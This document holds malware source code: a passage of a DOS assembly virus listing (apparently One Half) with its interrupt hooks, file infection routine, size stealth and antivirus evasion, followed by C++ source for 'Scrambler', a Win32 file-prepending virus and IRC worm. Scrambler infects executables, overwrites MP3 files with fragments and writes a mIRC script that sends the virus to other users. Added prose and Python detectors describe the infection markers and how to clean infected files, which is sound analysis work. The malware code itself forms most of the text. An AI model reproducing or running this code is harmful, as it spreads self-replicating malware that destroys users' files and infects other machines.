;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz setz my own error_handler
sub_1034 proc near
push dx
push ds
push cs
pop ds
mov ax, 3524h ; gimme old_int_24h
call int_21h
mov ds:[old_int_24h - p + 2], es ; store it
mov ds:[old_int_24h - p], bx
mov ax, 2524h ; and set my own
mov dx, offset new_int_24h - p__ ; handler
call int_21h
pop ds
pop dx
retn ; and end ...
sub_1034 endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz setz back old_int_24h
sub_1052 proc near
mov ax, 2524h
lds dx, dword ptr cs:[old_int_24h - p]; gimme old_int_24h
call int_21h ; set it back
retn ; and end ...
sub_1052 endp

_com_ db 04h, '.COM' ; offset 105eh
_exe_ db 04h, '.EXE' ; offset 1063h
_scan_ db 04h, 'SCAN' ; offset 1068h
_clean_ db 05h, 'CLEAN' ; offset 106dh
_findviru_ db 08h, 'FINDVIRU' ; offset 1073h
_guard_ db 05h, 'GUARD' ; offset 107ch
_nod_ db 03h, 'NOD' ; offset 1082h
_vsafe_ db 05h, 'VSAFE' ; offset 1086h
_msav_ db 04h, 'MSAV' ; offset 108ch
_chkdsk_ db 06h, 'CHKDSK' ; offset 1091h

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz checkz the file_name and drive ...
sub_1098 proc near
push dx
push bx
push cx
push si
push di ; push regz
push ds
push es
push ax
mov si, dx ; gimme file_name_offset
mov di, name_buffer - p ; gimme buffer where 2 store
push cs
pop es
lea bx, [di-1]
mov cx, 4Bh ; try it 4bh*

locloop_10AD:
lodsb ; read byte
cmp al, 61h ; 'a'
jb short loc_10B8 ; low_case ?
cmp al, 7Ah ; 'z'
ja short loc_10B8
sub al, 20h ; yope so make high_case
loc_10B8:
push ax
push si
loc_10BA: ; nope
cmp al, 20h ; space ?
jne short loc_10C7
lodsb ; read byte
or al, al ; null ?
jnz loc_10BA
pop si ; yope
pop si
jmp short loc_10D7 ; end ...
loc_10C7:
pop si
pop ax
cmp al, 5Ch ; '\'
je short loc_10D5
cmp al, 2Fh ; '/'
je short loc_10D5
cmp al, 3Ah ; ':'
jne short loc_10D7
loc_10D5:
mov bx, di ; store offset 2 bx
loc_10D7:
stosb ; store byte
or al, al ; null ?
jz short loc_10DE
loop locloop_10AD ; and go on

loc_10DE: ; yope
mov si, offset _com_ - p ; check 4 .COM or .EXE
sub di, 5 ; sub 5 (.XXX, 0)
push cs
pop ds
call sub_1149 ; it'z .COM ?
jz short loc_10F0
call sub_1149 ; it'z .EXE ?
jnz short loc_113C
loc_10F0: ; yope
pop ax
push ax
xchg di, bx ; gimme file_name_offset
inc di ; inc it (/, \, or : ...)
cmp ax, 4B00h ; fc run file ?
jne short loc_1107
mov si, offset _chkdsk_ - p
call sub_1149 ; do we run CHKDSK ?
jnz short loc_1107
mov byte ptr ds:[fcb_jmp_ - p], offset loc_121a - (fcb_jmp_ + 1)
; yope so turn off fcb_sub_viruz_size
loc_1107:
mov cx, 7 ; check 4 7 antivirusez
mov si, offset _scan_ - p ; start with SCAN

locloop_110D:
push cx
call sub_1149 ; compare name
pop cx
jz short loc_113C ; it'z antiviruz ?
loop locloop_110D ; nope go on

mov si, offset name_buffer - p ; gimme name_buffer
xor bl, bl ; 2 get drive
lodsw
cmp ah, 3Ah ; ':'
jne short loc_1125
sub al, 40h ; ok make valid_drive_number
mov bl, al ; and store it 2 bl
loc_1125:
mov ax, 4408h ; get drive_statuz
call int_21h
or ax, ax ; medium can be exchanged ?
which_jump_? db 74h
db offset loc_1146 - ($ + 1)
mov ax, 4409h ; get far disk statuz
call int_21h
jc short loc_113C ; error ?
test dh, 10h ; iz far disk in net ?
jnz short loc_1146
loc_113C:
stc ; set error_flag
loc_113D:
pop ax
pop es
pop ds
pop di
pop si ; restore regz
pop cx
pop bx
pop dx
retn ; and end ...
loc_1146:
clc ; clear error_flag
jmp short loc_113D ; and end ...
sub_1098 endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz comparez 2 stringz
sub_1149 proc near
push di
lodsb ; gimme bytez_count
mov cl, al ; store it 2 cx
mov ax, si ; gimme si
add ax, cx ; add bytez_count 2 offset
repe cmpsb ; compare
mov si, ax ; store new_offset
pop di
retn ; and end ...
sub_1149 endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz checkz whether there'z a viruz in the file or not ...
; and if not returnz in ax the value which iz 4 infected
sub_1157 proc near
push dx
mov ax, es:[bx+2] ; gimme date
xor dx, dx
div word ptr cs:[date_div-p]; div it
mov ax, es:[bx] ; gimme time
and al, 1Fh ; and it
cmp al, dl ; the same ?
stc ; set Cflag (infected)
jz short loc_1176
mov ax, es:[bx] ; gimme time
and ax, 0FFE0h ; and it
or al, dl ; or it with date
clc ; clear Cflag (not infected)
loc_1176:
pop dx
retn ; and end ...
sub_1157 endp

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Sub viruz_size
sub_1178 proc near
sub word ptr es:[bx], offset buffer - p; sub viruz_file
sbb word ptr es:[bx+2], 0
jnc short loc_ret_118E ; underflow ?
add word ptr es:[bx], offset buffer - p; yope
adc word ptr es:[bx+2], 0 ; so add it back

loc_ret_118E:
retn
sub_1178 endp
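sub_1157 is the infection marker and sub_1178 the size stealth that the int 21h hook applies to FCB and find-first/next results: the file's DOS date is divided by date_div (a word kept elsewhere in the virus body, not in this part of the listing), the low byte of the remainder is compared with the 2-second field (low five bits) of the DOS time, and a match means "already infected", in which case the directory entry's size is reduced by the virus length unless that would underflow. The Python below is an added example, not code from the page, that reproduces both checks over a few constructed directory entries; date_div and the virus length are parameters because this section does not give their values.

```python
# Model of One Half's timestamp marker (sub_1157) and size stealth (sub_1178).
# Added example; date_div and virus_len are parameters because the listing
# above does not show their values.


def dos_time(hours: int, minutes: int, seconds: int) -> int:
    """Pack a DOS time word: hhhhh mmmmmm sssss, seconds in 2-second units."""
    return (hours << 11) | (minutes << 5) | (seconds // 2)


def dos_date(year: int, month: int, day: int) -> int:
    """Pack a DOS date word: yyyyyyy mmmm ddddd, year relative to 1980."""
    return ((year - 1980) << 9) | (month << 5) | day


def date_remainder(date: int, date_div: int) -> int:
    """dl after 'div word ptr [date_div]' with dx:ax = 0:date."""
    return (date % date_div) & 0xFF


def is_marked(time: int, date: int, date_div: int) -> bool:
    """sub_1157's test: the 2-second field of the time equals the date remainder."""
    return (time & 0x1F) == date_remainder(date, date_div)


def mark_time(time: int, date: int, date_div: int) -> int:
    """Time stamp sub_1157 returns in ax for a not-yet-infected file: hours and
    minutes kept, 2-second field replaced by the date remainder.  sub_0E7C
    writes it back unless its random draw (dx = 1Eh) comes out as zero."""
    return (time & 0xFFE0) | date_remainder(date, date_div)


def stealth_size(size: int, virus_len: int) -> int:
    """sub_1178: subtract virus_len from the 32-bit size unless that underflows."""
    return size - virus_len if size >= virus_len else size


def scan_entries(entries, date_div: int, virus_len: int):
    """Apply both checks to (name, time, date, size) directory entries and
    return (name, infected, size_as_shown_by_the_resident_virus) tuples."""
    out = []
    for name, time, date, size in entries:
        infected = is_marked(time, date, date_div)
        shown = stealth_size(size, virus_len) if infected else size
        out.append((name, infected, shown))
    return out
```

Because only five bits of the time take part, a clean file whose 2-second field happens to equal the date remainder is mistaken for an infected one and left alone (and its size is under-reported while the virus is resident); conversely a scanner reading the disk with the virus not resident sees the true sizes and can use is_marked as a cheap first filter before looking for the body itself.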

;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz iz main infection routine ...
sub_118F proc near
push ax
push bx
push cx
push si ; push regz
push di
push bp
push ds
push es
call sub_1034 ; set my int_24h
mov ax, 4300h ; gimme file_attribz
call int_21h
mov cs:[file_attribz - p], cx; store it
mov ax, 4301h ; set new attribz
xor cx, cx ; no attribz
call int_21h
jc short loc_11D3 ; error ?
mov ax, 3D02h ; open file 4 read_&_write
call int_21h
jc short loc_11CA ; error ?
push dx
push ds
push cs
pop ds
push cs
pop es
mov ds:[handle - p], ax ; store handle
call sub_0E7C ; ok infect the file
mov ah, 3Eh
call sub_0E6F ; close file
pop ds
pop dx
loc_11CA:
mov ax, 4301h ; set back old_attribz
db 0b9h ; mov cx, ?
file_attribz dw 20h
call int_21h
loc_11D3:
call sub_1052 ; set back old_int_24h
pop es
pop ds
pop bp
pop di
pop si ; restore regz
pop cx
pop bx
pop ax
retn ; and end ...
sub_118F endp

new_int_21h:
pushf
sti
cmp ah, 11h ; find_first_FCB_file ?
je short loc_11EB
cmp ah, 12h ; find next_FCB_file ?
jne short loc_121A
loc_11EB:
db 0ebh
fcb_jmp_ db 0
push bx
push es
push ax
mov ah, 2Fh ; gimme DTA_addr
call int_21h
pop ax
call int_21h ; do FCB_function
cmp al, 0FFh ; did we find something ?
je short loc_1216
push ax ; yope
cmp byte ptr es:[bx], 0FFh ; extended FCB ?
jne short loc_1207
add bx, 7 ; yope so jump over ext_FCB
loc_1207:
add bx, 17h ; go2 time
call sub_1157 ; check whether infected
pop ax
jnc short loc_1216 ; already infected ?
add bx, 6 ; go2 file_size
call sub_1178 ; sub viruz_size
loc_1216: ; nope
pop es
pop bx
popf
iret
loc_121A:
cmp ah, 4Eh ; find_first_file ?
je short loc_1224
cmp ah, 4Fh ; find_next_file ?
jne short loc_1250
loc_1224:
push bx
push es
push ax
mov ah, 2Fh ; gimme DTA_addr
call int_21h
pop ax
call int_21h ; do find_function
jc short loc_1249 ; error ?
push ax
add bx, 16h ; go2 time
call sub_1157 ; check whether infected
pop ax
jnc short loc_1242 ; already infected ?
add bx, 4 ; go2 file_size
call sub_1178 ; sub viruz_size
loc_1242: ; nope
pop es
pop bx ; restore regz
popf
clc ; clear error_flag
retf 2 ; and end ...
loc_1249: ; yope
pop es
pop bx ; restore regz
popf
stc ; set error_flag
retf 2 ; and end ...
loc_1250:
cmp ax, 4B53h ; it'z mark ?
jne short loc_125A
mov ax, 454Bh ; yope so get 454bh
popf
iret ; and end ...
loc_125A:
cmp ah, 4Ch ; prog'z_end ?
jne short loc_1265
mov byte ptr cs:[fcb_jmp_ - p], 0
loc_1265:
cld
push dx
cmp ax, 4B00h ; run_prog ?
jne short loc_12A9
db 0ebh
run_jmp db offset loc_12a7 - ($ + 1)
push ax
push bx
push ds ; push regz
push es
mov ah, 52h ; gimme list_of_listz
call int_21h
mov ax, es:[bx-2] ; gimme first_mcb
loc_127B:
mov ds, ax
add ax, ds:[3] ; go2 next mcb_block
inc ax
cmp byte ptr ds:[0], 5Ah ; last_one ?
jne loc_127B
mov bx, cs ; yope
cmp ax, bx ; it'z our mcb_block ?
jne short loc_129D
mov byte ptr ds:[0], 4Dh ; make middle_block
xor ax, ax
mov ds, ax
add word ptr ds:[413h], 4 ; add 4K 2 mem which we took
loc_129D:
mov byte ptr cs:[run_jmp-p], offset loc_12a7 - (run_jmp + 1)
pop es ; now jump 2 loc_12a7
pop ds
pop bx ; restore regz
pop ax
loc_12A7:
jmp short loc_12FD
loc_12A9:
cmp ah, 3Dh ; open_file ?
je short loc_12FD
cmp ah, 56h ; rename_file ?
je short loc_12FD
cmp ax, 6C00h ; ext_open_found ?
jne short loc_12C1
test dl, 00010010b ; action 02h or/and 10h ?
mov dx, si
jz short loc_12FD
jmp short loc_1307 ; yope
loc_12C1:
cmp ah, 3Ch ; found_file ?
je short loc_1307
cmp ah, 5Bh ; make_new_file ?
je short loc_1307
cmp ah, 3Eh ; close_file ?
jne short loc_12F6
cmp bx, word ptr cs:[ext_handle - p]; do we have
jne short loc_12F6 ; something 2 infect ?
or bx, bx ; handle is null ?
jz short loc_12F6
call int_21h ; close it
jc short loc_1323
push ds
push cs
pop ds
mov dx, offset ext_file_name - p; gimme file_name
call sub_118F ; and infect it
mov word ptr ds:[ext_handle - p], 0; zero ext_handle
pop ds
loc_12F0:
pop dx
popf
clc ; clear error_flag
retf 2 ; and end ...
loc_12F6:
pop dx
popf ; jmp 2 old_int_21h
jmp dword ptr cs:[old_int_21h - p__]
loc_12FD:
call sub_1098 ; check 4 file_name & disk
jc loc_12F6 ; error ?
call sub_118F ; infect it
jmp short loc_12F6
loc_1307:
cmp word ptr cs:[ext_handle - p], 0
jne loc_12F6 ; ext_file already founded ?
call sub_1098 ; check 4 file_name & disk
jc loc_12F6 ; error ?
mov word ptr cs:[file_offset - p], dx; store file_name_
pop dx ; _offset
push dx
call int_21h ; found it
db 0bah ; mov dx, ?
file_offset dw 45cch
jnc short loc_1329 ; error ?
loc_1323: ; yope
pop dx
popf
stc ; set error_flag
retf 2 ; and end ...
loc_1329:
push cx
push si
push di ; ok
push es ; move file_name
xchg si, dx ; 2 our buffer
mov di, offset ext_handle - p
push cs
pop es
stosw ; and store handle of course
mov cx, 4Bh ; move 4bh bytez
rep movsb ; and finally move
pop es
pop di
pop si ; restore regz
pop cx
jmp short loc_12F0 ; and end ...

;
db 'Did you leave the room ?'
;
run_counter dw 04FBh
buffer db 160h dup(?)
three_bytez db ? ; offset 14bah
; instr_buffer - 3
; 0e9h disp16 haz 3 bytez ...
handle dw ? ; offset 14bbh
instr_buffer db 10 dup(?) ; offset 14bdh
file_buffer db 1ah dup(?) ; offset 14c7h
old_int_24h dd ? ; offset 14e1h
file_time_date dd ? ; offset 14e5h
ext_handle dw ? ; offset 14e9h
ext_file_name db 4bh dup(?) ; offset 14ebh
name_buffer db 4bh dup(?) ; offset 1536h
;
seg_a ends
end start
/*
Virus Name: Scrambler
Version: B
Type: Win32 EXE Prepender / I-Worm
Author: Gigabyte
Homepage: http://gigabyte.coderz.net
*/

#include <iostream>
#include <stdio.h>      // FILE, fopen, fread, fwrite, fprintf
#include <stdlib.h>     // rand, srand
#include <string.h>     // strcpy, strcat, memcpy
#include <windows.h>
#include <direct.h>     // _chdir
#include <io.h>         // _unlink
#include <time.h>

using namespace std;

// Path buffers shared by the routines below.
char hostfile[MAX_PATH], CopyHost[MAX_PATH], Virus[MAX_PATH];
char Buffer[MAX_PATH], mp3[MAX_PATH], mp3copy[MAX_PATH];
// checksum receives the two bytes found at file offset 18..19 of a candidate
// host; gbmark holds the infection marker "gb" they are compared with.
// Neither is NUL-terminated.
char checksum[2];
char gbmark[2], CopyName[10], ScramFile[MAX_PATH], FullPath[MAX_PATH];
char WinScript[MAX_PATH], DirToInfect[MAX_PATH], RepairHost[MAX_PATH];
FILE *scrambler;        // the mIRC script.ini being written

// Reads the two bytes at offset 18 and 19 of SRCFileName into checksum[].
// An infected file (and the virus itself) carries "gb" there; main() only
// looks at the second byte.  The original read 19 single bytes into a
// one-byte buffer and strcpy'd that unterminated buffer into checksum[2],
// which overran it; a seek to offset 18 reads the same two bytes.
void VirCheck(char SRCFileName[])
{
    FILE *SRC;
    checksum[0] = checksum[1] = 0;
    SRC = fopen(SRCFileName, "rb");
    if(SRC)
    {
        if(!fseek(SRC, 18, SEEK_SET))
            fread(checksum, 1, 2, SRC);
        fclose(SRC);
    }
}

// Copies the first 4928 * 8 = 39424 bytes of SRCFileName (the virus body,
// i.e. the size of the compiled virus image) to DSTFileName, which is
// truncated first.
void WriteVirus(char SRCFileName[], char DSTFileName[])
{
    FILE *SRC, *DST;
    char Buffer[1024];
    size_t Counter = 0;
    int v = 0;
    SRC = fopen(SRCFileName, "rb");
    if(SRC)
    {
        DST = fopen(DSTFileName, "wb");
        if(DST)
        {
            for (v = 0; v < 4928; v ++)
            {
                Counter = fread(Buffer, 1, 8, SRC);
                if(Counter)
                    fwrite(Buffer, 1, Counter, DST);
            }
            fclose(DST);
        }
        fclose(SRC);
    }
}

// Appends the whole of SRCFileName (the saved original host) to DSTFileName,
// which by then already holds the virus body: this is the prepending step.
void AddOrig(char SRCFileName[], char DSTFileName[])
{
    FILE *SRC, *DST;
    char Buffer[1024];
    size_t Counter = 0;
    SRC = fopen(SRCFileName, "rb");
    if(SRC)
    {
        DST = fopen(DSTFileName, "ab");
        if(DST)
        {
            while(! feof(SRC))
            {
                Counter = fread(Buffer, 1, 1024, SRC);
                if(Counter)
                    fwrite(Buffer, 1, Counter, DST);
            }
            fclose(DST);
        }
        fclose(SRC);
    }
}

// Writes DSTFileName = SRCFileName minus its first 39424 bytes, i.e. recovers
// the original host from an infected file.  The original loop read 4928
// chunks of 8 bytes and "wrote" them with fwrite(Buffer, 0, 0, DST), a no-op
// whose only effect was to skip the virus body; a seek does the same.
void CopyOrig(char SRCFileName[], char DSTFileName[])
{
    FILE *SRC, *DST;
    char Buffer[1024];
    size_t Counter = 0;
    SRC = fopen(SRCFileName, "rb");
    if(SRC)
    {
        DST = fopen(DSTFileName, "wb");
        if(DST)
        {
            if(!fseek(SRC, 4928 * 8, SEEK_SET))
            {
                while(! feof(SRC))
                {
                    Counter = fread(Buffer, 1, 1024, SRC);
                    if(Counter)
                        fwrite(Buffer, 1, Counter, DST);
                }
            }
            fclose(DST);
        }
        fclose(SRC);
    }
}
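WriteVirus, AddOrig and CopyOrig above are the whole prepender: an infected file is the first 4928 * 8 = 39424 bytes of the virus image followed by the untouched host, and the "gb" that VirCheck looks for at file offset 18 (offset 0x12 of an MZ header is the e_csum field, normally zero, which is why the mark can live there) is what stops the virus from infecting a file twice. The Python below is an added example, not Gigabyte's code, that turns those facts into a detector and a cleaner: it recognises the mark, tells the dropped virus copy from an infected host by length, strips the 39424-byte body and checks that what remains starts with an MZ header. The "infected" sample it runs on is constructed by build_infected_sample, not taken from a real binary. The virus itself compares only the second marker byte, so its own infection test is looser than this detector.

```python
# Detector / cleaner for the Scrambler.b prepender (added example, not from the page).
VIRUS_LEN   = 4928 * 8   # WriteVirus copies 4928 chunks of 8 bytes = 39424 bytes
MARK_OFFSET = 18         # VirCheck reads the 19th and 20th byte of the file
MARK        = b"gb"      # gbmark; at offset 0x12 of an MZ header this is e_csum


def has_scrambler_mark(data: bytes) -> bool:
    """Both marker bytes present at offset 18 (the virus only checks the 'b')."""
    return data[MARK_OFFSET:MARK_OFFSET + 2] == MARK


def classify(data: bytes) -> str:
    """'clean', 'virus body' (the dropped copy, nothing appended) or
    'infected host' (virus body followed by the original program)."""
    if not has_scrambler_mark(data):
        return "clean"
    if len(data) <= VIRUS_LEN:
        return "virus body"
    return "infected host"


def is_scrambler_prepended(data: bytes) -> bool:
    return classify(data) == "infected host"


def extract_host(data: bytes) -> bytes:
    """Return the original host, i.e. everything after the virus body, and
    refuse if it does not look like an MZ executable (AddOrig appends the
    host byte for byte, so a real host keeps its own header)."""
    if not is_scrambler_prepended(data):
        raise ValueError("no Scrambler.b marker at offset 18, or no host appended")
    host = data[VIRUS_LEN:]
    if host[:2] != b"MZ":
        raise ValueError("bytes after the virus body do not start with an MZ header")
    return host


def build_infected_sample(host: bytes) -> bytes:
    """Constructed fixture: a fake 39424-byte virus image carrying the mark
    (MZ signature and e_csum = 'gb', rest zero) with the host appended, which
    is the layout CopyFile/WriteVirus followed by AddOrig produce."""
    stub = bytearray(VIRUS_LEN)
    stub[:2] = b"MZ"
    stub[MARK_OFFSET:MARK_OFFSET + 2] = MARK
    return bytes(stub) + host
```

A clean executable whose e_csum field happens to hold 0x6267 would be misclassified by this check, so in practice the mark is only a fast pre-filter and the body itself (a fixed 39424-byte image, easy to hash) is what a scanner should match on.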
bool FileExists(char *FileName)
{
HANDLE Exists;
Exists = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
OPEN_EXISTING, 0, 0);
if(Exists == INVALID_HANDLE_VALUE)
return false;
CloseHandle(Exists);
return true;
}

// Payload: rebuilds DSTFileName from sparse pieces of SRCFileName.  Up to 40
// times it skips 204800 bytes of the source, reads 60000, skips 104448 bytes
// in the (freshly truncated) destination and writes the piece there, so what
// is left of the MP3 is a handful of fragments separated by zero-filled gaps.
// The original had a stray "Buffer == 0;" (a comparison, not an assignment)
// and always wrote 60000 bytes even when the last read came up short.
void Scramble(char SRCFileName[], char DSTFileName[])
{
    FILE *SRC, *DST;
    char Buffer[60000];
    size_t Counter = 0;
    int v = 0;
    SRC = fopen(SRCFileName, "rb");
    if(SRC)
    {
        DST = fopen(DSTFileName, "wb");
        if(DST)
        {
            for (v = 0; v < 40; v ++)
            {
                if(!fseek(SRC, 204800, SEEK_CUR))
                {
                    Counter = fread(Buffer, 1, 60000, SRC);
                    if(Counter)
                    {
                        if(!fseek(DST, 104448, SEEK_CUR))
                            fwrite(Buffer, 1, Counter, DST);
                    }
                }
            }
            fclose(DST);
        }
        fclose(SRC);
    }
}

// Runs Scramble() over every *.mp3 in FolderSearch: each file is first copied
// to <windir>\system\mp3.tmp and then rebuilt in place from that copy.
void ScrambleMP3(char FolderSearch[])
{
    WIN32_FIND_DATA FindData;
    HANDLE FoundFile;
    char FolderSearch2[MAX_PATH];
    strcpy(FolderSearch2, FolderSearch);
    strcat(FolderSearch2,"\\*.mp3");
    FoundFile = FindFirstFile(FolderSearch2, &FindData);
    if(FoundFile != INVALID_HANDLE_VALUE)
    {
        do
        {
            if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
                continue;

            GetWindowsDirectory(Buffer,MAX_PATH);
            _chdir(Buffer);
            _chdir("system");           // mp3.tmp is relative to <windir>\system

            strcpy(mp3, FolderSearch);
            strcat(mp3, "\\");
            strcat(mp3, FindData.cFileName );
            strcpy(mp3copy, "mp3.tmp");
            CopyFile(mp3, mp3copy, FALSE);

            Scramble(mp3copy,mp3);
            _unlink(mp3copy);
        }
        while (FindNextFile(FoundFile, &FindData));
        FindClose(FoundFile);
    }
}

// Walks every subdirectory of Path (skipping "." , ".." and any name that
// starts with a dot), recursing first and then scrambling the MP3s in that
// subdirectory.  MP3s directly in Path itself are not touched by this call.
void HDDSearch(char Path[])
{
    WIN32_FIND_DATA FindData;
    HANDLE FoundFile;
    char Path2[MAX_PATH], Folder[MAX_PATH];
    strcpy(Path2, Path);
    strcat(Path2, "\\*.*");
    FoundFile = FindFirstFile(Path2, &FindData);
    if(FoundFile != INVALID_HANDLE_VALUE)
    {
        do
        {
            if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                strcpy(Folder, Path);
                strcat(Folder, "\\");
                strcat(Folder, FindData.cFileName);
                if(FindData.cFileName[0] != '.')
                {
                    HDDSearch(Folder);
                    ScrambleMP3(Folder);
                }
            }
        }
        while (FindNextFile(FoundFile, &FindData));
        FindClose(FoundFile);
    }
}

// Writes a mIRC script.ini that DCC-sends the dropped copy of the virus
// (<windir>\system\<CopyName>) to everybody who joins a channel the victim
// is in.  The first string literal was broken across two lines by the
// layout; it is one line of script.
void ScriptFile()
{
    GetWindowsDirectory(Buffer,MAX_PATH);
    fprintf(scrambler, "[script]\n"
                       "n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }\n"
                       "n1=/dcc send $nick");
    fprintf(scrambler, " %s\\system\\%s\nn2=}\n", Buffer, CopyName);
}

int main(int argc, char **argv)
{
    cout << "Scrambler" << endl;
    cout << "by Gigabyte" << endl;

    srand( (unsigned)time( NULL ) );

    // Random five-letter name (letters a..j) plus ".exe" for the dropped copy.
    for(int t = 0; t < 5; t++)
        CopyName[t] = char('a' + (rand() % 10));
    strcpy(CopyName + 5, ".exe");

    // Drop the virus body (first 39424 bytes of our own image) into <windir>\system.
    strcpy(Virus, argv[0]);
    GetWindowsDirectory(Buffer,MAX_PATH);

    strcpy(FullPath, Buffer);
    strcat(FullPath, "\\system\\");
    strcat(FullPath, CopyName);
    WriteVirus(Virus, FullPath);

    WIN32_FIND_DATA FindData;
    HANDLE FoundFile;

    // Prepend the virus to the *.exe files in the Windows directory itself.
    strcpy(DirToInfect, Buffer);
    strcat(DirToInfect, "\\*.exe");
    FoundFile = FindFirstFile(DirToInfect, &FindData);

    if(FoundFile != INVALID_HANDLE_VALUE)
    {
        do
        {
            if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
                continue;

            GetWindowsDirectory(Buffer,MAX_PATH);
            _chdir(Buffer);
            _chdir("system");           // host.tmp below lands in <windir>\system

            strcpy(hostfile, Buffer);
            strcat(hostfile, "\\");
            strcat(hostfile, FindData.cFileName);

            VirCheck(hostfile);         // bytes 18..19 of the candidate -> checksum

            memcpy(gbmark, "gb", 2);    // original strcpy'd 3 bytes into a 2-byte array

            // The author's filename filter (which executables it was meant to
            // spare is not stated): skip names whose first letter is P, R, E,
            // T, W or w, whose fourth character is D or whose sixth is R, and
            // anything that already carries the 'b' of the marker.
            const char *n = FindData.cFileName;
            if(n[3] == 'D' || n[0] == 'P' || n[0] == 'R' || n[0] == 'E' ||
               n[0] == 'T' || n[0] == 'W' || n[0] == 'w' || n[5] == 'R' ||
               checksum[1] == gbmark[1])
                continue;

            // host.tmp = original host; hostfile = dropped virus copy + original host.
            strcpy(CopyHost, "host.tmp");
            CopyFile(hostfile, CopyHost, FALSE);
            strcpy(Virus, argv[0]);
            CopyFile(FullPath, hostfile, FALSE);
            AddOrig(CopyHost, hostfile);
            _unlink("host.tmp");
        }
        while (FindNextFile(FoundFile, &FindData));
        FindClose(FoundFile);
    }

if(FileExists("c:\\mirc\\mirc32.exe"))
{
FoundFile = FindFirstFile("c:\\mirc\\download\\*.exe", &FindData);

if(FoundFile != INVALID_HANDLE_VALUE)
{
do
{
if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
}

else
{
_chdir(Buffer);
_chdir("system");

strcpy(hostfile, "c:\\mirc\\download\\");
strcat(hostfile, FindData.cFileName );

VirCheck(hostfile);

strcpy(gbmark,"gb");

if(checksum[1] != gbmark[1])
{
strcpy(CopyHost, "host.tmp");
CopyFile(hostfile, CopyHost, FALSE);

WriteVirus(Virus, hostfile);
AddOrig(CopyHost, hostfile);
_unlink("host.tmp");
}
}
}
while (FindNextFile(FoundFile, &FindData));
FindClose(FoundFile);
}
}
scrambler = fopen("c:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

